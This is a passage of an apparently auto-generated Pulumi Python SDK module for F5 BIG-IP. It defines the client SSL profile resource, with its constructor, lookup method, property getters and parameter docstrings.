handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
`ltm.ProfileClientSsl` Manages client SSL profiles on a BIG-IP
Resources should be named with their "full path". The full path is the combination of the partition + name (example: /Common/my-pool ) or partition + directory + name of the resource (example: /Common/test/my-pool )
## Example Usage
```python
import pulumi
import pulumi_f5bigip as f5bigip
test__client_ssl = f5bigip.ltm.ProfileClientSsl("test-ClientSsl",
authenticate="always",
ciphers="DEFAULT",
defaults_from="/Common/clientssl",
name="/Common/test-ClientSsl")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] name: Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renogotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renogotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProfileClientSslArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`ltm.ProfileClientSsl` Manages client SSL profiles on a BIG-IP
Resources should be named with their "full path". The full path is the combination of the partition + name (example: /Common/my-pool ) or partition + directory + name of the resource (example: /Common/test/my-pool )
## Example Usage
```python
import pulumi
import pulumi_f5bigip as f5bigip
test__client_ssl = f5bigip.ltm.ProfileClientSsl("test-ClientSsl",
authenticate="always",
ciphers="DEFAULT",
defaults_from="/Common/clientssl",
name="/Common/test-ClientSsl")
```
:param str resource_name: The name of the resource.
:param ProfileClientSslArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProfileClientSslArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProfileClientSslCertKeyChainArgs']]]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProfileClientSslArgs.__new__(ProfileClientSslArgs)
__props__.__dict__["alert_timeout"] = alert_timeout
__props__.__dict__["allow_non_ssl"] = allow_non_ssl
__props__.__dict__["authenticate"] = authenticate
__props__.__dict__["authenticate_depth"] = authenticate_depth
__props__.__dict__["c3d_client_fallback_cert"] = c3d_client_fallback_cert
__props__.__dict__["c3d_drop_unknown_ocsp_status"] = c3d_drop_unknown_ocsp_status
__props__.__dict__["c3d_ocsp"] = c3d_ocsp
__props__.__dict__["ca_file"] = ca_file
__props__.__dict__["cache_size"] = cache_size
__props__.__dict__["cache_timeout"] = cache_timeout
__props__.__dict__["cert"] = cert
__props__.__dict__["cert_extension_includes"] = cert_extension_includes
__props__.__dict__["cert_key_chains"] = cert_key_chains
__props__.__dict__["cert_life_span"] = cert_life_span
__props__.__dict__["cert_lookup_by_ipaddr_port"] = cert_lookup_by_ipaddr_port
__props__.__dict__["chain"] = chain
__props__.__dict__["ciphers"] = ciphers
__props__.__dict__["client_cert_ca"] = client_cert_ca
__props__.__dict__["crl_file"] = crl_file
__props__.__dict__["defaults_from"] = defaults_from
__props__.__dict__["forward_proxy_bypass_default_action"] = forward_proxy_bypass_default_action
__props__.__dict__["full_path"] = full_path
__props__.__dict__["generation"] = generation
__props__.__dict__["generic_alert"] = generic_alert
__props__.__dict__["handshake_timeout"] = handshake_timeout
__props__.__dict__["inherit_cert_keychain"] = inherit_cert_keychain
__props__.__dict__["key"] = key
__props__.__dict__["mod_ssl_methods"] = mod_ssl_methods
__props__.__dict__["mode"] = mode
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__.__dict__["name"] = name
__props__.__dict__["partition"] = partition
__props__.__dict__["passphrase"] = passphrase
__props__.__dict__["peer_cert_mode"] = peer_cert_mode
__props__.__dict__["proxy_ca_cert"] = proxy_ca_cert
__props__.__dict__["proxy_ca_key"] = proxy_ca_key
__props__.__dict__["proxy_ca_passphrase"] = proxy_ca_passphrase
__props__.__dict__["proxy_ssl"] = proxy_ssl
__props__.__dict__["proxy_ssl_passthrough"] = proxy_ssl_passthrough
__props__.__dict__["renegotiate_period"] = renegotiate_period
__props__.__dict__["renegotiate_size"] = renegotiate_size
__props__.__dict__["renegotiation"] = renegotiation
__props__.__dict__["retain_certificate"] = retain_certificate
__props__.__dict__["secure_renegotiation"] = secure_renegotiation
__props__.__dict__["server_name"] = server_name
__props__.__dict__["session_mirroring"] = session_mirroring
__props__.__dict__["session_ticket"] = session_ticket
__props__.__dict__["sni_default"] = sni_default
__props__.__dict__["sni_require"] = sni_require
__props__.__dict__["ssl_c3d"] = ssl_c3d
__props__.__dict__["ssl_forward_proxy"] = ssl_forward_proxy
__props__.__dict__["ssl_forward_proxy_bypass"] = ssl_forward_proxy_bypass
__props__.__dict__["ssl_sign_hash"] = ssl_sign_hash
__props__.__dict__["strict_resume"] = strict_resume
__props__.__dict__["tm_options"] = tm_options
__props__.__dict__["unclean_shutdown"] = unclean_shutdown
super(ProfileClientSsl, __self__).__init__(
'f5bigip:ltm/profileClientSsl:ProfileClientSsl',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProfileClientSslCertKeyChainArgs']]]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None) -> 'ProfileClientSsl':
"""
Get an existing ProfileClientSsl resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile.Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It Should Full path `/partition/profile_name`
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] name: Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates.When ignore, specifies that the system ignores certificates from client systems.When require, specifies that the system requires a client to present a valid certificate.When request, specifies that the system requests a valid certificate from a client but always authenticate the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renogotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renogotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set the system request secure renegotation of SSL connections.
`require` is a default setting and when set the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
The `require-strict` setting the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProfileClientSslState.__new__(_ProfileClientSslState)
__props__.__dict__["alert_timeout"] = alert_timeout
__props__.__dict__["allow_non_ssl"] = allow_non_ssl
__props__.__dict__["authenticate"] = authenticate
__props__.__dict__["authenticate_depth"] = authenticate_depth
__props__.__dict__["c3d_client_fallback_cert"] = c3d_client_fallback_cert
__props__.__dict__["c3d_drop_unknown_ocsp_status"] = c3d_drop_unknown_ocsp_status
__props__.__dict__["c3d_ocsp"] = c3d_ocsp
__props__.__dict__["ca_file"] = ca_file
__props__.__dict__["cache_size"] = cache_size
__props__.__dict__["cache_timeout"] = cache_timeout
__props__.__dict__["cert"] = cert
__props__.__dict__["cert_extension_includes"] = cert_extension_includes
__props__.__dict__["cert_key_chains"] = cert_key_chains
__props__.__dict__["cert_life_span"] = cert_life_span
__props__.__dict__["cert_lookup_by_ipaddr_port"] = cert_lookup_by_ipaddr_port
__props__.__dict__["chain"] = chain
__props__.__dict__["ciphers"] = ciphers
__props__.__dict__["client_cert_ca"] = client_cert_ca
__props__.__dict__["crl_file"] = crl_file
__props__.__dict__["defaults_from"] = defaults_from
__props__.__dict__["forward_proxy_bypass_default_action"] = forward_proxy_bypass_default_action
__props__.__dict__["full_path"] = full_path
__props__.__dict__["generation"] = generation
__props__.__dict__["generic_alert"] = generic_alert
__props__.__dict__["handshake_timeout"] = handshake_timeout
__props__.__dict__["inherit_cert_keychain"] = inherit_cert_keychain
__props__.__dict__["key"] = key
__props__.__dict__["mod_ssl_methods"] = mod_ssl_methods
__props__.__dict__["mode"] = mode
__props__.__dict__["name"] = name
__props__.__dict__["partition"] = partition
__props__.__dict__["passphrase"] = passphrase
__props__.__dict__["peer_cert_mode"] = peer_cert_mode
__props__.__dict__["proxy_ca_cert"] = proxy_ca_cert
__props__.__dict__["proxy_ca_key"] = proxy_ca_key
__props__.__dict__["proxy_ca_passphrase"] = proxy_ca_passphrase
__props__.__dict__["proxy_ssl"] = proxy_ssl
__props__.__dict__["proxy_ssl_passthrough"] = proxy_ssl_passthrough
__props__.__dict__["renegotiate_period"] = renegotiate_period
__props__.__dict__["renegotiate_size"] = renegotiate_size
__props__.__dict__["renegotiation"] = renegotiation
__props__.__dict__["retain_certificate"] = retain_certificate
__props__.__dict__["secure_renegotiation"] = secure_renegotiation
__props__.__dict__["server_name"] = server_name
__props__.__dict__["session_mirroring"] = session_mirroring
__props__.__dict__["session_ticket"] = session_ticket
__props__.__dict__["sni_default"] = sni_default
__props__.__dict__["sni_require"] = sni_require
__props__.__dict__["ssl_c3d"] = ssl_c3d
__props__.__dict__["ssl_forward_proxy"] = ssl_forward_proxy
__props__.__dict__["ssl_forward_proxy_bypass"] = ssl_forward_proxy_bypass
__props__.__dict__["ssl_sign_hash"] = ssl_sign_hash
__props__.__dict__["strict_resume"] = strict_resume
__props__.__dict__["tm_options"] = tm_options
__props__.__dict__["unclean_shutdown"] = unclean_shutdown
return ProfileClientSsl(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="alertTimeout")
def alert_timeout(self) -> pulumi.Output[str]:
"""
Alert time out
"""
return pulumi.get(self, "alert_timeout")
@property
@pulumi.getter(name="allowNonSsl")
def allow_non_ssl(self) -> pulumi.Output[str]:
"""
Enables or disables acceptance of non-SSL connections, When creating a new profile, the setting is provided by the parent profile
"""
return pulumi.get(self, "allow_non_ssl")
@property
@pulumi.getter
def authenticate(self) -> pulumi.Output[str]:
"""
Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
"""
return pulumi.get(self, "authenticate")
@property
@pulumi.getter(name="authenticateDepth")
def authenticate_depth(self) -> pulumi.Output[int]:
"""
Specifies the maximum number of certificates to be traversed in a client certificate chain
"""
return pulumi.get(self, "authenticate_depth")
@property
@pulumi.getter(name="c3dClientFallbackCert")
def c3d_client_fallback_cert(self) -> pulumi.Output[str]:
"""
Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
"""
return pulumi.get(self, "c3d_client_fallback_cert")
@property
@pulumi.getter(name="c3dDropUnknownOcspStatus")
def c3d_drop_unknown_ocsp_status(self) -> pulumi.Output[str]:
"""
Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the onnection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
"""
return pulumi.get(self, "c3d_drop_unknown_ocsp_status")
@property
@pulumi.getter(name="c3dOcsp")
def c3d_ocsp(self) -> pulumi.Output[str]:
"""
Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
"""
return pulumi.get(self, "c3d_ocsp")
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> pulumi.Output[str]:
"""
Client certificate file path. Default None.
"""
return pulumi.get(self, "ca_file")
@property
